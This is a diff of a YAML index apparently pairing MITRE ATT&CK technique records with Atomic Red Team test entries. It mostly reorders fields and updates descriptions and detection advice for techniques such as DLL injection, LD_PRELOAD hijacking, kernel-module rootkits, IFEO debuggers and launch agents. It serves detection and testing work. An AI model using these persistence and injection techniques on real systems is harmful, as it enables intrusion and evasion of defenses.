- July 2017) \n\nVariations of this method such as reflective DLL injection
- (writing a self-mapping DLL into a process) and memory module (map DLL when
- writing into process) overcome the address relocation issue as well as the
- additional APIs to invoke execution (since these methods load and execute
- the files in memory by manually preforming the function of LoadLibrary
- ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process
- Injection July 2017) \n\nRunning code in the context of another process may
- allow access to the process's memory, system/network resources, and possibly
- elevated privileges. Execution via DLL injection may also evade detection
- from security products since the execution is masked under a legitimate process. "
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:32:05.210Z'
+ modified: '2020-06-20T22:17:59.148Z'
created: '2020-01-14T01:26:08.145Z'
x_mitre_platforms:
- Windows
@@ -2379,7 +2469,7 @@ privilege-escalation:
- File monitoring
- API monitoring
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
atomic_tests: []
T1548.004:
@@ -2438,27 +2528,27 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T12:04:37.823Z'
created: '2020-01-30T14:40:20.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Jimmy Astle, @AstleJimmy, Carbon Black
- - Erika Noerenberg, @gutterchurl, Carbon Black
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline
executions which may indicate that AuthorizationExecuteWithPrivileges
is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges
is being called. Monitoring OS API callbacks for the execution can also be
a way to detect this behavior but requires specialized security tooling.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Jimmy Astle, @AstleJimmy, Carbon Black
+ - Erika Noerenberg, @gutterchurl, Carbon Black
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1546.014:
technique:
@@ -2497,18 +2587,18 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T21:37:25.307Z'
created: '2020-01-24T15:15:13.426Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Ivan Sinyakov
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: Monitor emond rules creation by checking for files created
- or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor emond rules creation by checking for files created
+ or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_contributors:
+ - Ivan Sinyakov
+ x_mitre_platforms:
+ - macOS
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -2561,25 +2651,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:37:25.477Z'
+ modified: '2020-07-09T13:55:51.501Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - System calls
- - Binary file metadata
- - Process use of network
- - WMI Objects
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
of abnormal commands such as execution of unknown programs, opening network
@@ -2600,8 +2675,23 @@ privilege-escalation:
of behavior that could lead to other activities, such as making network connections
for Command and Control, learning details about the environment through Discovery,
and conducting Lateral Movement. "
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - System calls
+ - Binary file metadata
+ - Process use of network
+ - WMI Objects
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.005:
technique:
@@ -2639,49 +2729,49 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1068:
technique:
- id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Privilege Escalation
- description: |-
- Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
-
- When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
+ created: '2017-05-31T21:30:55.066Z'
+ modified: '2020-03-26T21:12:49.194Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1068
external_id: T1068
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:12:49.194Z'
- created: '2017-05-31T21:30:55.066Z'
+ description: |-
+ Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
+
+ When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
+ name: Exploitation for Privilege Escalation
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839
x_mitre_version: '1.2'
x_mitre_data_sources:
- Windows Error Reporting
@@ -2778,24 +2868,24 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:38:26.296Z'
+ modified: '2020-06-20T22:26:33.191Z'
created: '2020-01-14T17:18:32.126Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating
EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and
SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated
with this technique have also used SendNotifyMessage (Citation: Microsoft
SendNotifyMessage function) to trigger the associated window procedure and
eventual malicious injection. (Citation: Endgame Process Injection July 2017)'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1484:
technique:
@@ -2874,17 +2964,10 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:17:41.231Z'
created: '2019-03-07T14:10:32.650Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System access controls
+ - File system access controls
x_mitre_detection: "It is possible to detect GPO modifications by monitoring
directory service changes using Windows event logs. Several events may be
logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory
@@ -2897,10 +2980,17 @@ privilege-escalation:
value modifications, like those to SeEnableDelegationPrivilege, can also be
searched for in events associated with privileges assigned to new logons (Event
ID 4672) and assignment of user rights (Event ID 4704). "
- x_mitre_defense_bypassed:
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574:
technique:
@@ -2917,7 +3007,7 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -2929,17 +3019,15 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -2952,13 +3040,15 @@ privilege-escalation:
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1546.012:
technique:
@@ -3024,25 +3114,25 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T19:39:50.839Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+
+ Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
- API monitoring
- Windows event logs
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
- Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -3146,6 +3236,11 @@ privilege-escalation:
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
source_name: Securelist Ventir
+ - source_name: Trend Micro Skidmap
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
+ description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
+ Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
+ Retrieved June 4, 2020.
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
@@ -3165,7 +3260,7 @@ privilege-escalation:
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
- Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+ Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
type: attack-pattern
kill_chain_phases:
@@ -3173,27 +3268,28 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:14:29.149Z'
+ modified: '2020-06-30T21:23:15.188Z'
created: '2020-01-24T17:42:23.339Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_contributors:
- - Jeremy Galloway
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: |-
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.
- Adversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
- x_mitre_permissions_required:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Jeremy Galloway
+ - Red Canary
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
@@ -3270,29 +3366,31 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:50:36.235Z'
created: '2020-01-24T14:21:52.750Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor processes for those that may be used to modify binary
+ headers. Monitor file systems for changes to application binaries and invalid
+ checksums/signatures. Changes to binaries that do not line up with application
+ updates or patches are also extremely suspicious.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- Binary file metadata
- x_mitre_detection: Monitor processes for those that may be used to modify binary
- headers. Monitor file systems for changes to application binaries and invalid
- checksums/signatures. Changes to binaries that do not line up with application
- updates or patches are also extremely suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -3301,6 +3399,10 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -3326,20 +3428,20 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -3405,6 +3507,23 @@ privilege-escalation:
name: bash
T1547.008:
technique:
+ created: '2020-01-24T18:38:55.801Z'
+ modified: '2020-03-25T16:52:26.567Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
+ description: |-
+ Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
+
+ Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
+ name: LSASS Driver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547.008
@@ -3425,23 +3544,6 @@ privilege-escalation:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Driver
- description: |-
- Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
-
- Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:52:26.567Z'
- created: '2020-01-24T18:38:55.801Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -3532,20 +3634,20 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:11:45.513Z'
created: '2020-01-17T16:10:58.592Z'
- x_mitre_platforms:
- - macOS
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitor Launch Agent creation through additional plist files
and utilities such as Objective-See’s KnockKnock application. Launch Agents
also require files on disk for persistence which can also be monitored via
other file monitoring applications.
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_platforms:
+ - macOS
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -3635,18 +3737,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:27:49.609Z'
created: '2020-01-17T19:23:15.227Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: 'Monitor for launch daemon creation or modification through
- plist files and utilities such as Objective-See''s KnockKnock application. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Monitor for launch daemon creation or modification through
+ plist files and utilities such as Objective-See''s KnockKnock application. '
+ x_mitre_platforms:
+ - macOS
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -3714,12 +3816,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -3730,11 +3831,12 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -3796,21 +3898,21 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
